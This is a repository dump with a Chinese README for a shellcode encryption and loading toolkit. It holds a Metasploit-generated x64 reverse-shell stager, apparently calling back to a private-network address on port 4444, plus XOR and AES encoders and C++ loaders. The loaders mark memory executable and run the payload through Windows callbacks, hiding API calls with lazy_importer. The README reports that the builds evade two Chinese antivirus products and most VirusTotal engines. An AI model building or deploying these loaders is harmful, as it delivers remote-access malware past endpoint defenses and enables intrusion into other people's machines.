├── .gitignore
├── Debug
├── aes加密.exe
└── aes加密.pdb
├── README.md
├── README
├── image-20230515195113865.png
├── image-20230515195404012.png
├── image-20230515201325408.png
├── image-20230515201541815.png
├── image-20230516154122994.png
├── image-20230516154853419.png
└── image-20230516155107883.png
├── Shellcode加密库
├── AES.cpp
├── AES.h
├── Base64.cpp
├── Base64.h
├── Shellcode加密库.cpp
├── Shellcode加密库.h
├── Shellcode加密库.vcxproj
├── Shellcode加密库.vcxproj.filters
├── Shellcode加密库.vcxproj.user
└── x64
│ ├── Debug
│ ├── AES.obj
│ ├── Base64.obj
│ ├── Shellcode加密库.Build.CppClean.log
│ ├── Shellcode加密库.lib.recipe
│ ├── Shellcode加密库.log
│ ├── Shellcode加密库.obj
│ ├── Shellcode加密库.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── Lib-link.read.1.tlog
│ │ ├── Lib-link.write.1.tlog
│ │ ├── Lib.command.1.tlog
│ │ └── Shellcode加密库.lastbuildstate
│ └── Shellcode加密库.vcxproj.FileListAbsolute.txt
│ └── Release
│ ├── AES.obj
│ ├── Base64.obj
│ ├── Shellcode加密库.Build.CppClean.log
│ ├── Shellcode加密库.lib.recipe
│ ├── Shellcode加密库.log
│ ├── Shellcode加密库.obj
│ ├── Shellcode加密库.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Lib-link.read.1.tlog
│ ├── Lib-link.write.1.tlog
│ ├── Lib.command.1.tlog
│ └── Shellcode加密库.lastbuildstate
│ └── Shellcode加密库.vcxproj.FileListAbsolute.txt
├── aes加密
├── Debug
│ ├── Base64.obj
│ ├── aes.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.ilk
│ ├── aes加密.log
│ ├── aes加密.obj
│ ├── aes加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── aes加密.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── encrypt_shellcode.obj
│ ├── lazy_importer.obj
│ ├── vc143.idb
│ └── vc143.pdb
├── Release
│ ├── AES.obj
│ ├── Base64.obj
│ ├── Shellcode_AesEncrypt.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.log
│ ├── aes加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── aes加密.lastbuildstate
│ │ └── unsuccessfulbuild
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── lazy_importer.obj
│ └── vc143.pdb
├── Shellcode_AesDecrypt.cpp
├── Shellcode_AesEncrypt.cpp
├── aes加密.vcxproj
├── aes加密.vcxproj.filters
├── aes加密.vcxproj.user
├── lazy_importer.cpp
├── lazy_importer.hpp
├── shellcode.txt
├── test.txt
└── x64
│ ├── Debug
│ ├── Shellcode_AesEncrypt.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.ilk
│ ├── aes加密.log
│ ├── aes加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── aes加密.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── lazy_importer.obj
│ ├── vc143.idb
│ ├── vc143.pdb
│ └── vcpkg.applocal.log
│ └── Release
│ ├── Shellcode_AesDecrypt.obj
│ ├── Shellcode_AesEncrypt.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.iobj
│ ├── aes加密.ipdb
│ ├── aes加密.log
│ ├── aes加密.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Masm.read.1u.tlog
│ ├── Masm.write.1u.tlog
│ ├── aes加密.lastbuildstate
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ └── link.write.1.tlog
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── lazy_importer.obj
│ ├── syscalls-asm.x64.obj
│ ├── syscalls.obj
│ ├── vc143.pdb
│ └── vcpkg.applocal.log
├── rsa加密
├── applink.c
├── libcrypto-3-x64.dll
├── main.cpp
├── private.pem
├── public.pem
├── rsa加密.vcxproj
├── rsa加密.vcxproj.filters
├── rsa加密.vcxproj.user
└── x64
│ ├── Debug
│ ├── applink.obj
│ ├── main.obj
│ ├── rsa加密.Build.CppClean.log
│ ├── rsa加密.exe.recipe
│ ├── rsa加密.ilk
│ ├── rsa加密.log
│ ├── rsa加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── link.write.1.tlog
│ │ ├── link.write.2u.tlog
│ │ └── rsa加密.lastbuildstate
│ ├── rsa加密.vcxproj.FileListAbsolute.txt
│ ├── vc143.idb
│ └── vc143.pdb
│ └── Release
│ ├── applink.obj
│ ├── rsa加密.Build.CppClean.log
│ ├── rsa加密.exe.recipe
│ ├── rsa加密.log
│ ├── rsa加密.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── rsa加密.lastbuildstate
│ └── unsuccessfulbuild
│ ├── rsa加密.vcxproj.FileListAbsolute.txt
│ └── vc143.pdb
├── shellcode加密.sln
├── x64
├── Debug
│ ├── Shellcode加密库.idb
│ ├── Shellcode加密库.lib
│ ├── Shellcode加密库.pdb
│ ├── aes加密.exe
│ ├── aes加密.pdb
│ ├── rsa加密.exe
│ ├── rsa加密.exp
│ ├── rsa加密.lib
│ ├── rsa加密.pdb
│ ├── xor加密.exe
│ └── xor加密.pdb
└── Release
│ ├── Shellcode加密库.lib
│ ├── Shellcode加密库.pdb
│ ├── aes加密.exe
│ ├── aes加密.pdb
│ ├── xor加密.exe
│ └── xor加密.pdb
└── xor加密
├── Shellcode_XorEncoder.py
├── x64
├── Debug
│ ├── vc143.idb
│ ├── vc143.pdb
│ ├── xor加密.Build.CppClean.log
│ ├── xor加密.exe.recipe
│ ├── xor加密.ilk
│ ├── xor加密.log
│ ├── xor加密.obj
│ ├── xor加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── link.write.1.tlog
│ │ └── xor加密.lastbuildstate
│ └── xor加密.vcxproj.FileListAbsolute.txt
└── Release
│ ├── vc143.pdb
│ ├── vcpkg.applocal.log
│ ├── xor加密.Build.CppClean.log
│ ├── xor加密.exe.recipe
│ ├── xor加密.iobj
│ ├── xor加密.ipdb
│ ├── xor加密.log
│ ├── xor加密.obj
│ ├── xor加密.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ └── xor加密.lastbuildstate
│ └── xor加密.vcxproj.FileListAbsolute.txt
├── xor加密.cpp
├── xor加密.vcxproj
├── xor加密.vcxproj.filters
└── xor加密.vcxproj.user
/.gitignore:
--------------------------------------------------------------------------------
1 | .vs/
--------------------------------------------------------------------------------
/Debug/aes加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Debug/aes加密.exe
--------------------------------------------------------------------------------
/Debug/aes加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Debug/aes加密.pdb
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 前言
2 |
3 | ## 什么是私钥和公钥
4 |
5 | 私钥和公钥是密码学中用于实现加密、解密和数字签名等功能的关键组件。
6 |
7 | 私钥是一种加密算法中的秘密密钥,只有密钥的拥有者可以访问和使用它。私钥通常用于数字签名和数据加密等场景中,它可以用于对数据进行加密,同时也可以用于解密已经被加密的数据。
8 |
9 | 公钥是与私钥对应的一种公开密钥,它可以被任何人访问和使用。公钥通常用于数据加密、身份认证和数字签名等场景中。公钥可以被用来加密数据,同时也可以用于验证数字签名的有效性。
10 |
11 | 在非对称加密算法中,公钥和私钥是一对密钥,它们共同参与加密和解密过程。公钥用于加密数据,而私钥用于解密数据。因此,使用非对称加密算法时,数据的接收方会将其私钥保存为秘密,而将其公钥发送给发送方。这样,发送方就可以使用接收方的公钥来加密数据,而接收方可以使用其私钥来解密数据。
12 |
13 | 需要注意的是,私钥和公钥是成对出现的,它们必须同时使用才能确保数据的安全性和完整性。因此,在使用私钥和公钥进行数据加密、解密和数字签名等操作时,必须确保私钥的安全性和保密性
14 |
15 |
16 |
17 |
18 | ## 了解对称加密和非对称加密
19 |
20 | - 对称加密:在对称加密中,加密和解密使用的是同一个密钥,通常称为共享密钥。这意味着在加密数据时,发送方和接收方都需要使用相同的密钥。对称加密算法的速度较快,适用于对大量数据进行加密。然而,对称加密的一个主要缺点是密钥管理。由于发送方和接收方需要使用相同的密钥,因此密钥的安全传输和存储成为一个挑战。一旦密钥被泄露,加密数据的安全性就会受到威胁。常见的对称加密算法有:AES(高级加密标准)、DES(数据加密标准)和3DES(三重数据加密标准)。
21 | - 非对称加密:非对称加密使用一对密钥,分别称为公钥和私钥。公钥是公开的,可以被任何人获取,而私钥是保密的,只有密钥所有者才能访问。在非对称加密中,数据可以用公钥加密,然后只能用相应的私钥解密;反之亦然,用私钥加密的数据只能用公钥解密。这样,密钥的管理问题得到了解决,因为只需要保护私钥的安全。非对称加密的一个缺点是加密和解密过程相对较慢,因此通常不适用于加密大量数据。常见的非对称加密算法有:RSA(Rivest-Shamir-Adleman)、DSA(数字签名算法)和ECC(椭圆曲线密码学)。
22 |
23 | 在实际应用中,对称加密和非对称加密通常会结合使用,以充分利用两者的优点。例如,通过非对称加密安全地传输对称加密的密钥,然后使用对称加密对数据进行加密。这样既解决了密钥管理问题,又能快速地加密大量数据。
24 |
25 |
26 |
27 |
28 | # XOR加密
29 |
30 | ## 什么是xor加密
31 |
32 | XOR加密又称为异或加密,属于对称加密。在异或加密中,使用一个密钥(通常称为密钥流)与明文数据进行异或操作,生成加密后的密文。解密过程与加密过程相同,将密文与相同的密钥流进行异或操作,即可恢复原始明文数据。需要注意的是,当密钥较短且循环重复使用时(下文示例即是如此),只要已知与密钥等长的一段明文,就能由密文直接推算出密钥,因此这种做法只能算作混淆,不能提供真正的保密性。
33 |
34 |
35 |
36 |
37 | ## 代码实现
38 |
39 | 使用`Shellcode_XorEncoder.py`对shellcode进行异或加密,随后输出加密后的shellcode
40 |
41 | ```python
# Repeating-key XOR transform: takes the raw bytes and the key as input.
def xor_encrypt(shellcode, key):
    """Return a bytearray where byte i of ``shellcode`` is XORed with ``key[i % len(key)]``.

    The key is reused cyclically, so applying the function a second time with
    the same key restores the input. Because the key repeats, any stretch of
    known input as long as the key reveals the key; this is an encoding, not
    a confidentiality mechanism.
    """
    span = len(key)
    # The modulo wraps the key index so a short key covers input of any length.
    return bytearray(value ^ key[pos % span] for pos, value in enumerate(shellcode))
53 |
54 | def main():
55 | # msf生成的shellcode
56 | buf = b""
57 | buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
58 | buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
59 | buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
60 | buf += b"\x50\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48\x31\xc0"
61 | buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
62 | buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
63 | buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
64 | buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
65 | buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
66 | buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
67 | buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
68 | buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
69 | buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
70 | buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
71 | buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
72 | buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
73 | buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
74 | buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
75 | buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
76 | buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
77 | buf += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
78 | buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
79 | buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
80 | buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
81 | buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
82 | buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
83 | buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
84 | buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
85 | buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
86 | buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
87 | buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
88 | buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
89 | buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
90 | buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
91 | buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
92 | buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
93 | buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
94 | buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
95 | buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
96 | buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
97 | buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
98 | buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
99 | buf += b"\xf0\xb5\xa2\x56\xff\xd5"
100 |
101 | shellcode = bytearray(buf)
102 |
103 | # 定义密钥
104 | key = bytearray(b'henry')
105 |
106 | # 使用xor_encrypt函数加密shellcode
107 | encrypted_shellcode = xor_encrypt(shellcode, key)
108 |
109 | # 输出加密后的shellcode
110 | print("Encrypted shellcode:")
111 | encrypted_shellcode_string = ""
112 | for byte in encrypted_shellcode:
113 | encrypted_shellcode_string += ("\\x%02x"%byte)
114 | print(encrypted_shellcode_string)
115 |
116 | if __name__ == '__main__':
117 | main()
118 |
119 | ```
120 |
121 |
122 |
123 |
124 | 使用`xor加密.cpp`解密加密后的shellcode,随后将其加载进内存
125 |
126 | ```cpp
127 | #include
128 | #include
129 |
// Demo loader from the README: XOR-decodes an embedded buffer with a repeating
// key, makes the decoded local array executable and passes its address to
// EnumUILanguages as the enumeration callback.
130 | int main() {
131 | // XOR-encoded payload bytes (elided as "..." in this listing)
132 | char encryptedShellcode[] = "...";
133 |
134 | // Decoding key, hard-coded alongside the data it protects
135 | char key[] = "henry";
136 |
137 | // Output array with the same size as the encoded array; it is a local (automatic-storage) array
138 | unsigned char shellcode[sizeof encryptedShellcode];
139 |
140 | // Key length, used to wrap the key index
141 | int keylength = strlen(key);
142 |
143 | // XOR each byte with key[i % keylength] and print it in \x hex form.
// sizeof on the array counts the literal's terminating NUL, so that byte is decoded as well.
144 | for (int i = 0; i < sizeof encryptedShellcode; i++) {
145 | shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
146 | printf("\\x%x", shellcode[i]);
147 | }
148 |
149 | // Address of the decoded array
150 | char* addrShellcode = (char*)shellcode;
151 |
152 | // Receives the previous page protection from VirtualProtect
153 | DWORD dwOldPro = 0;
154 |
155 | // Switch the pages holding the decoded array to read/write/execute; the BOOL result is never checked.
// Detection note: memory that is both writable and executable and is not backed by a loaded image is a common memory-scanner signal.
156 | BOOL ifExec = VirtualProtect(addrShellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);
157 |
158 | // EnumUILanguages calls the pointer it receives as its callback; here that pointer is the decoded array, so this call is what transfers execution.
// Detection note: the callback address lies outside every loaded module, which is the observable anomaly.
159 | EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
160 | }
161 | ```
162 |
163 |
164 |
165 |
166 | # AES加密
167 |
168 | ## 什么是aes加密
169 |
170 | AES加密,即高级加密标准(Advanced Encryption Standard)加密,是一种对称密钥加密算法,广泛应用于现代密码学中
171 |
172 | AES加密的特点如下:
173 |
174 | - 对称密钥:加密和解密过程使用相同的密钥。因此,密钥的安全性至关重要。
175 | - 密钥长度:AES支持128位、192位和256位三种密钥长度,安全性随密钥长度的增加而增加。
176 | - 分组长度:AES加密算法对数据进行分组,每个分组固定为128位(16字节)。
177 | - 加密过程:包括多轮(轮数与密钥长度有关,如AES-128需要10轮,AES-192需要12轮,AES-256需要14轮)的加密操作。每轮操作包括四个步骤:SubBytes(字节替换)、ShiftRows(行移位)、MixColumns(列混淆,最后一轮除外)和AddRoundKey(轮密钥加)
178 |
179 |
180 |
181 |
182 | ## 代码实现
183 |
184 | 这里直接使用乌鸦师傅的aes加密代码:https://cloud.tencent.com/developer/article/1939317,我将aes加密的函数封装在一个静态链接库项目里,再添加了密钥生成函数和shellcode数组转字符串函数,一共有四个函数
185 |
186 | ```cpp
187 | //AES加密
188 | string EncryptionAES(const string& strSrc, const char* g_key, const char* g_iv);
189 |
190 | //AES解密
191 | string DecryptionAES(const string& strSrc, const char* g_key, const char* g_iv);
192 |
193 | //生成随机密钥
194 | string random_string(size_t length);
195 |
196 | //将char类型的shellcode转换成string类型的
197 | string toHexString(unsigned char* data, size_t len);
198 | ```
199 |
200 |
201 |
202 |
203 | `Shellcode_AesEncrypt.cpp`对shellcode进行Aes加密
204 |
205 | ```cpp
206 | #include
207 | #include "Shellcode加密库.h"
208 |
209 | using namespace std;
210 |
211 | int main() {
212 |
213 | //填写msf或cs生成的shellcode
214 | unsigned char buf[] =
215 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
216 | "\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x51"
217 | "\x48\x8b\x52\x20\x56\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"
218 | "\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
219 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
220 | "\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
221 | "\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
222 | "\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
223 | "\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6"
224 | "\x4d\x31\xc9\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
225 | "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
226 | "\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
227 | "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
228 | "\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
229 | "\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
230 | "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
231 | "\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
232 | "\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
233 | "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
234 | "\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
235 | "\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
236 | "\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
237 | "\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
238 | "\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
239 | "\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
240 | "\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
241 | "\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
242 | "\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
243 | "\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
244 | "\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
245 | "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
246 | "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
247 | "\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
248 | "\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
249 | "\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
250 | "\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
251 | "\xf0\xb5\xa2\x56\xff\xd5";
252 |
253 |
254 | //生成随机16位的key值和iv值
255 | srand(time(0)); // initialize random seed
256 | string g_key = random_string(16);
257 | string g_iv = random_string(16);
258 | cout << "key值: " << g_key << endl;
259 | cout << "iv值: " << g_iv <
278 |
279 | `Shellcode_AesDecrypt.cpp`用来解密shellcode并加载,此处还调用了lazy_importer库的函数:https://github.com/JustasMasiulis/lazy_importer,此库实现动态调用系统api函数, 只需在函数前面添加(`LI_FN`), 若此函数的某个参数需填`NULL`, 那么需要改成`nullptr`
280 |
281 | ```cpp
282 | #define _CRT_SECURE_NO_DEPRECATE
283 | #include
284 | #include "lazy_importer.hpp"
285 | #define BUF_SIZE 4096
286 | #include
287 | #include "Shellcode加密库.h"
288 |
289 | using namespace std;
290 | char g_key[17] = "M7N@ExCVB@dFd]3W"; //填写key密钥
291 | char g_iv[17] = "}%?#U)6;9#uOg6gL"; //定义iv向量
292 |
293 |
294 | void main(int argc, char* argv[])
295 | {
296 | // 加密后的shellcode
297 | string buf = "Zq3ejgFVl/qtP/dqcQidBN6BKWTiL/KZZpfW+Iy8ZMnaA4Au2oEHMltr8TihG9yvvQ1MDt0PFqboWsF5ka9y72L9xJ5a4HRBFspK3vMwvtKMH8Xtko6ErmfUUB8pv4n4DybjQseeuYtPqEDGvX8zlwONk9nyu5r8aozfNCxLvnbFyzX5OLInbra87Az3FGhilZnCwMufIPZLgolhRkgyhnS96CsMst/pNz4AqcCNmfe7Gw1rcuVgHqETNxwIsNzWDmUguUJ173NHAZJpKmF1k39IYnF4JMvVk3QH81jzX68ClhGvADXnPlmz20PHzzjKOzkovpW4cPT3Q/1B2HOwWwhKPZdLKakJeuSa1YLwv6Nu3UdP8II6dGDVsgb4y/U7O1aiHbJFXSM5XXx7eKqTe8MV8gLfwNNR6M4qaWEm7XmdsE0WryhL5F1SFe/6uxPrcIFnGE3I0jVntLjYfVWotkkrEgL7M6rXlOgKHF3Pd6AIIPm23zULA9NyJsHuKmqOUgyzf7LiPxPcIqhNo5DA1opqCqBS3XTeusUjr6x3AyBT9MquUeJKuB7BBtWJWyuQzTzzSXaDRmErc6lSTM+DKTo101TZYKz4Jl2I8xDMey7IJT+Z1iYt/thgi1FeRLnrGAFKhNn3xAqjYORcKXLPGkSWq1MoZZxOJi6QF1uqMlB3tDBD6w/pAhuqHR+ZxnaHjfbqybG8rNLXc6hshmazoiFakC9QwHM9RgyVde9GGpkNr+wzjp1Tc1SbXSHtFHXumU1IP6NvLqU0/tWrTui9t8nrsqNFgGlQUXyAzmnk04vXJeD7kxGbSFSXwffPGUlOtDS1q/+P+fwj+ZvjpmiPLzoo+hgZ0UOtyO1ThltWr4rWitqMPneleC11qlVcyOp0odOTxuZiUeJyTOY9wHWwXg3snVWat23VSE7eQ4QWcF/GtfRVBsiGGENo1hH1nuxNTlEx/2os30f3IOj/yUfIXpuwHaWsNwlyw6119Z3PgCOdR+1qDCvJenZEsCkyjUJ830xC1V5VxCw1m0btTP+LaefsNEocc5V7fyNyaw0o72yl/g+bacycAbG/hIJlWbaXneDFysBLPtLFJjXm0gAsE3iyffdB9l6c8ffohInaNlWC8x7IDb4X6vrFC8cncDFb3NKIInVFR6bmqXfxXAamxzKXdpVjngPZg6YCWpTUtobZhThnhpO1KZxvHoFCcidxLq+mifWHpcldcS/ez2vWGdriSbd6i9FGGaxQQvHze1HmaLP/sj34JDMfIVfOI2/4sejnjluKfhcu5I0P76idHJKMDHr+rJBtpSxX3jc+UNlfeFmhjuN2Yy/TO1kLRfUdfAeZP2Vz4WhITdRf8bvqJA==";
298 | // 解密shellcode
299 | string strbuf = DecryptionAES(buf, g_key, (char*)g_iv);
300 |
301 | //将解密的shellcode放到shellcode数组中
302 | char* p = (char*)strbuf.c_str();
303 | unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));
304 | for (size_t i = 0; i < strbuf.length() / 2; i++) {
305 | sscanf(p, "%02x", &shellcode[i]);
306 | p += 2;
307 | }
308 |
309 | //输出shellcode数组里的内容
310 | int ShellcodeSize = strbuf.length() / 2;
311 | printf("Decrypted buffer:\n");
312 | for (int i = 0; i < ShellcodeSize; i++) {
313 | printf("\\x%02x", shellcode[i]);
314 | }
315 |
316 | //加载shellcode
317 | char* orig_buffer;
318 | orig_buffer = (char*)LI_FN(VirtualAlloc)(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
319 |
320 | RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
321 |
322 | //使用EnumUILanguages函数执行解密后的shellcode
323 | //EnumUILanguages((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
324 |
325 | //LI_FN(EnumUILanguages)((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
326 |
327 | //使用EnumFontsW回调函数加载shellcode
328 | EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
329 |
330 | }
331 | ```
332 |
333 |
334 |
335 |
336 | ## 运行测试
337 |
338 | 给aes加密项目添加引用,选择Shellcode加密库
339 |
340 |
341 |
342 |
343 |
344 |
345 | 修改项目属性,在附加包含目录处添加上Shellcode加密库项目的路径
346 |
347 |
348 |
349 |
350 |
351 |
352 | 使用`Shellcode_AesEncrypt.cpp`进行加密, 随后控制台输出key值、iv值、以及加密后的shellcode
353 |
354 | 
355 |
356 |
357 |
358 |
359 | 打开`Shellcode_AesDecrypt.cpp`,填写上述生成的值, 随后生成可执行文件
360 |
361 | 
362 |
363 |
364 |
365 |
366 | 将生成的可执行文件放到火绒和360里测试,没有发现报毒
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 | 上传至VirusTotal检查,只有四个报毒,免杀效果还是可以的。需要说明的是,这一结果主要反映上传当时各引擎的静态扫描情况;程序在运行时申请可读可写可执行的内存、再通过回调函数跳转到该内存执行,这类行为仍属于基于行为的检测所关注的特征
375 |
376 | 
377 |
378 |
379 |
380 |
381 | # Git项目地址
382 |
383 | https://github.com/xf555er/ShellcodeEncryption
--------------------------------------------------------------------------------
/README/image-20230515195113865.png:
--------------------------------------------------------------------------------
